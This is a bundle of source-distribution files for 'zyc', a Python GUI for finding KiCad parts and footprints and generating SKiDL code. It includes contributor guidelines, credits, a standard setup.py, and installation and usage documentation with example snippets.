articles, and such.
Submit Feedback
~~~~~~~~~~~~~~~
The best way to send feedback is to file an issue at https://github.com/devbisme/zyc/issues.
If you are proposing a feature:
* Explain in detail how it would work.
* Keep the scope as narrow as possible, to make it easier to implement.
* Remember that this is a volunteer-driven project, and that contributions
are welcome :)
Get Started!
------------
Ready to contribute? Here's how to set up `zyc` for local development.
1. Fork the `zyc` repo on GitHub.
2. Clone your fork locally::
$ git clone git@github.com:your_name_here/zyc.git
3. Install your local copy into a virtualenv. Assuming you have virtualenvwrapper installed, this is how you set up your fork for local development::
$ mkvirtualenv zyc
$ cd zyc
$ python setup.py develop
4. Create a branch for local development::
$ git checkout -b name-of-your-bugfix-or-feature
Now you can make your changes locally.
5. Commit your changes and push your branch to GitHub::
$ git add .
$ git commit -m "Your detailed description of your changes."
$ git push origin name-of-your-bugfix-or-feature
6. Submit a pull request through the GitHub website.
Pull Request Guidelines
-----------------------
Before you submit a pull request, check that it meets these guidelines:
1. If the pull request adds functionality, the docs should be updated. Put
your new functionality into a function with a docstring, and add the
feature to the list in README.rst.
2. The pull request should work for Python 2.7 and >=3.5.
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/CONTRIBUTING.rst
|
CONTRIBUTING.rst
|
=======
Credits
=======
Development Lead
----------------
* Dave Vandenbout <devb@xess.com>
`Other Contributors <https://github.com/devbisme/zyc/graphs/contributors>`_
---------------------------------------------------------------------------
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/AUTHORS.rst
|
AUTHORS.rst
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
import sys
from setuptools import setup, find_packages
__author__ = "Dave Vandenbout"
__email__ = "devbisme@xess.com"
__version__ = "1.0.0"
if "sdist" in sys.argv[1:]:
with open("zyc/pckg_info.py", "w") as f:
for name in ["__version__", "__author__", "__email__"]:
f.write("{} = '{}'\n".format(name, locals()[name]))
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
requirements = [
"skidl >= 0.0.27",
"kinparse >= 0.1.0",
'enum34; python_version < "3.0"',
"wxpython >= 4.0.7",
"pykicad",
]
setup_requirements = []
test_requirements = []
setup(
author=__author__,
author_email=__email__,
version=__version__,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Manufacturing",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)",
],
description="A GUI for searching and selecting parts and footprints for use in SKiDL.",
entry_points={"gui_scripts": ["zyc = zyc.zyc:main"]},
install_requires=requirements,
license="MIT license",
long_description=readme + "\n\n" + history,
include_package_data=True,
keywords="zyc",
name="zyc",
packages=find_packages(include=["zyc"]),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
url="https://github.com/devbisme/zyc",
zip_safe=False,
)
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/setup.py
|
setup.py
|
.. include:: ../CONTRIBUTING.rst
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/contributing.rst
|
contributing.rst
|
Usage
============
Just enter `zyc` at the command line to bring up the GUI.

`zyc` has two cooperating panes: a part is searched for and selected in the top pane, and then the
same is done for a footprint in the bottom pane. Then you can paste a SKiDL `Part(...)` instantiation
with the part and footprint into a code editing window.
To begin, start off by typing some search terms describing the part you want
into the upper text-entry box (1) and hit `RETURN` or click the `Search` button (2).

`zyc` will scan through all the available parts looking for your search terms in the library names and
the part names, aliases, descriptions, and keywords. (This initial search takes 20-30 seconds, but
any further searches are quick because the part data gets cached.)
The search terms can contain one or more text strings and/or regular expressions (REs).
Any matching parts are displayed in the Library/Part table (1).
Clicking on a row in the table (2) displays the part's description and keywords (3), datasheet hyperlink (4), and
I/O pin table (5) on the right-side of the pane.

Selecting a part also loads the footprint search text-entry box (6) with an initial set of search terms formed from
the part's list of recommended footprints plus the number of part pins.
You can edit these search terms and add more to modify the footprint search.
(Which is handy because, in this case, the number of pins is wrong since the pin list only contains
six entries but the actual number of pins is eight. So I'll just remove it.)
Then press the `Search` button (7) to scan through all the footprints for matching terms.
(As with parts, the initial footprint search takes 20-30 seconds but further searches are fast
because of caching.)
The footprints that match the search terms appear in the Library/Footprint table (1).
In this case, there is only one.
Selecting it makes the footprint description appear (2) as well as a drawing of the footprint (3).
(If a hyperlink for the package datasheet was available, that would show up as well.)

Once a part and footprint are selected, you can click on the `Copy` button in the upper panel (1)
to place a `Part(...)` instantiation on the clipboard.

Then you can go anywhere (such as your code editor) and paste the clipboard contents to get the part
instantiation:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
```
If you check the `Tmplt` box (2) and then click the `Copy` button, a part template (instead of an instance)
gets placed on the clipboard and appears as follows:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC', dest=TEMPLATE,
footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
```
To make it easier to connect the pins, `zyc` lets you select the names from the pin list column (1).
Right-clicking on the table copies whatever is selected to the clipboard.

Then the pin names can be pasted into the code editor:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
"VDD",
"GP2",
"GP1",
"GP0",
"VSS",
"GP3"
```
Now you can use the strings to connect the microcontroller pins to various nets:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
          footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
uc["VDD", "VSS"] += Net('VCC'), Net('GND')
uc["GP0", "GP1", "GP2", "GP3"] += Bus('GP', 4)
```
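At this point the pasted snippet is nearly a complete SKiDL script. As a hedged sketch, adding the imports and a netlist call turns it into something you can run end to end (the output file name is whatever SKiDL defaults to):
```python
from skidl import Part, Net, Bus, generate_netlist

uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
          footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')

# Power and I/O connections, as pasted/typed above.
uc["VDD", "VSS"] += Net('VCC'), Net('GND')
uc["GP0", "GP1", "GP2", "GP3"] += Bus('GP', 4)

generate_netlist()  # write a KiCad netlist for the circuit built so far
```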
`zyc` lets you double-click on any table column header to re-sort the table
based on the contents of that column.
This can be useful in grouping pins by their names, functions, or part units
before selecting and pasting them.
Using an FPGA as an example, double-clicking the `Unit` column (1)
orders the table so you can select all the I/O pins in one of its banks (2).

Then the pins can be pasted:
```python
"IO_0_14",
"IO_0_15",
"IO_25_14",
"IO_25_15",
"IO_L1N_T0_AD0N_15",
"IO_L1N_T0_D01_DIN_14",
"IO_L1P_T0_AD0P_15",
"IO_L1P_T0_D00_MOSI_14",
"IO_L2N_T0_AD8N_15",
"IO_L2N_T0_D03_14",
"IO_L2P_T0_AD8P_15",
"IO_L2P_T0_D02_14",
"IO_L3N_T0_DQS_AD1N_15",
"IO_L3N_T0_DQS_EMCCLK_14",
"IO_L3P_T0_DQS_AD1P_15",
"IO_L3P_T0_DQS_PUDC_B_14",
"IO_L4N_T0_15",
"IO_L4N_T0_D05_14",
"IO_L4P_T0_15",
"IO_L4P_T0_D04_14",
"IO_L5N_T0_AD9N_15",
"IO_L5N_T0_D07_14",
"IO_L5P_T0_AD9P_15",
"IO_L5P_T0_D06_14",
"IO_L6N_T0_D08_VREF_14",
"IO_L6N_T0_VREF_15",
"IO_L6P_T0_15",
"IO_L6P_T0_FCS_B_14",
"IO_L7N_T1_AD2N_15",
"IO_L7N_T1_D10_14",
"IO_L7P_T1_AD2P_15",
"IO_L7P_T1_D09_14",
"IO_L8N_T1_AD10N_15",
"IO_L8N_T1_D12_14",
"IO_L8P_T1_AD10P_15",
"IO_L8P_T1_D11_14",
"IO_L9N_T1_DQS_AD3N_15",
"IO_L9N_T1_DQS_D13_14",
"IO_L9P_T1_DQS_14",
"IO_L9P_T1_DQS_AD3P_15",
"IO_L10N_T1_AD11N_15",
"IO_L10N_T1_D15_14",
"IO_L10P_T1_AD11P_15",
"IO_L10P_T1_D14_14",
"IO_L11N_T1_SRCC_14",
"IO_L11N_T1_SRCC_15",
"IO_L11P_T1_SRCC_14",
"IO_L11P_T1_SRCC_15",
"IO_L12N_T1_MRCC_14",
"IO_L12N_T1_MRCC_15",
"IO_L12P_T1_MRCC_14",
"IO_L12P_T1_MRCC_15",
"IO_L13N_T2_MRCC_14",
"IO_L13N_T2_MRCC_15",
"IO_L13P_T2_MRCC_14",
"IO_L13P_T2_MRCC_15",
"IO_L14N_T2_SRCC_14",
"IO_L14N_T2_SRCC_15",
"IO_L14P_T2_SRCC_14",
"IO_L14P_T2_SRCC_15",
"IO_L15N_T2_DQS_ADV_B_15",
"IO_L15N_T2_DQS_DOUT_CSO_B_14",
"IO_L15P_T2_DQS_15",
"IO_L15P_T2_DQS_RDWR_B_14",
"IO_L16N_T2_A15_D31_14",
"IO_L16N_T2_A27_15",
"IO_L16P_T2_A28_15",
"IO_L16P_T2_CSI_B_14",
"IO_L17N_T2_A13_D29_14",
"IO_L17N_T2_A25_15",
"IO_L17P_T2_A14_D30_14",
"IO_L17P_T2_A26_15",
"IO_L18N_T2_A11_D27_14",
"IO_L18N_T2_A23_15",
"IO_L18P_T2_A12_D28_14",
"IO_L18P_T2_A24_15",
"IO_L19N_T3_A09_D25_VREF_14",
"IO_L19N_T3_A21_VREF_15",
"IO_L19P_T3_A10_D26_14",
"IO_L19P_T3_A22_15",
"IO_L20N_T3_A07_D23_14",
"IO_L20N_T3_A19_15",
"IO_L20P_T3_A08_D24_14",
"IO_L20P_T3_A20_15",
"IO_L21N_T3_DQS_A06_D22_14",
"IO_L21N_T3_DQS_A18_15",
"IO_L21P_T3_DQS_14",
"IO_L21P_T3_DQS_15",
"IO_L22N_T3_A04_D20_14",
"IO_L22N_T3_A16_15",
"IO_L22P_T3_A05_D21_14",
"IO_L22P_T3_A17_15",
"IO_L23N_T3_A02_D18_14",
"IO_L23N_T3_FWE_B_15",
"IO_L23P_T3_A03_D19_14",
"IO_L23P_T3_FOE_B_15",
"IO_L24N_T3_A00_D16_14",
"IO_L24N_T3_RS0_15",
"IO_L24P_T3_A01_D17_14",
"IO_L24P_T3_RS1_15"
```
This is definitely something that would be difficult to type manually without making a mistake!
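The pasted names are also just Python strings, so a long bank of pins can be hooked up in a loop instead of spelled out one by one. A minimal sketch, reusing the earlier PIC10 part so it stays runnable (for the FPGA you'd substitute its pasted part and the bank list above):
```python
from skidl import Part, Bus

uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
          footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')

# Pin names pasted from zyc's pin table.
pasted_pins = ["GP0", "GP1", "GP2", "GP3"]

io = Bus('GP', len(pasted_pins))
for i, name in enumerate(pasted_pins):
    uc[name] += io[i]  # attach each named pin to its own bus line
```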
`zyc` requires minimal setup.
By default, it will use the `KICAD_SYMBOL_DIR` environment variable to look for part libraries,
and it will look for the global footprint library table (`fp_lib_table`) in the default location
where KiCad installs it on various OSes.
You can also add or change the directories that are searched for part libraries (1) or for
`fp_lib_table` files (2) using the menu items below:

If you change some part libraries or add more footprint files while `zyc` is
running, you'll want to refresh the part and footprint caches (3).
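If you'd rather point `zyc` at a particular symbol directory without editing your shell profile, one option is to set `KICAD_SYMBOL_DIR` just for the launch. A minimal sketch (the library path is an assumption; use wherever your KiCad symbols actually live):
```python
import os
import subprocess

# Assumed path -- adjust to your KiCad installation's symbol directory.
env = dict(os.environ, KICAD_SYMBOL_DIR="/usr/share/kicad/library")

# Launch the zyc GUI with the augmented environment.
subprocess.run(["zyc"], env=env)
```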
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/usage.md
|
usage.md
|
.. include:: ../AUTHORS.rst
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/authors.rst
|
authors.rst
|
Welcome to zyc's documentation!
======================================

.. toctree::
   :maxdepth: 2
   :caption: Contents:

   readme
   installation
   usage
   modules
   contributing
   authors
   history

Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/index.rst
|
index.rst
|
.. highlight:: shell

============
Installation
============
Stable release
--------------
To install zyc, run this command in your terminal:

.. code-block:: console

    $ pip install zyc

This is the preferred method to install zyc, as it will always install the most recent stable release.
If you don't have `pip`_ installed, this `Python installation guide`_ can guide
you through the process.
.. _pip: https://pip.pypa.io
.. _Python installation guide: http://docs.python-guide.org/en/latest/starting/installation/
From sources
------------
The sources for zyc can be downloaded from the `Github repo`_.
You can either clone the public repository:

.. code-block:: console

    $ git clone git://github.com/devbisme/zyc

Or download the `tarball`_:

.. code-block:: console

    $ curl -OL https://github.com/devbisme/zyc/tarball/master

Once you have a copy of the source, you can install it with:

.. code-block:: console

    $ python setup.py install

.. _Github repo: https://github.com/devbisme/zyc
.. _tarball: https://github.com/devbisme/zyc/tarball/master
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/installation.rst
|
installation.rst
|
.. include:: ../README.rst
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/readme.rst
|
readme.rst
|